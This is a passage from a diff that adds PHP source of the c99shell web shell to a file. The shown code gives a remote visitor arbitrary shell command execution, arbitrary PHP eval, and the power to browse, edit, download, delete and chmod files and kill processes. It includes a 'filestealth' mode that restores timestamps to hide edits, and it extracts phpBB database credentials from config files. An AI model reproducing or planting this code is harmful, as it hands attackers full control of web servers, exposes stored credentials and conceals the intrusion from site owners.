+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
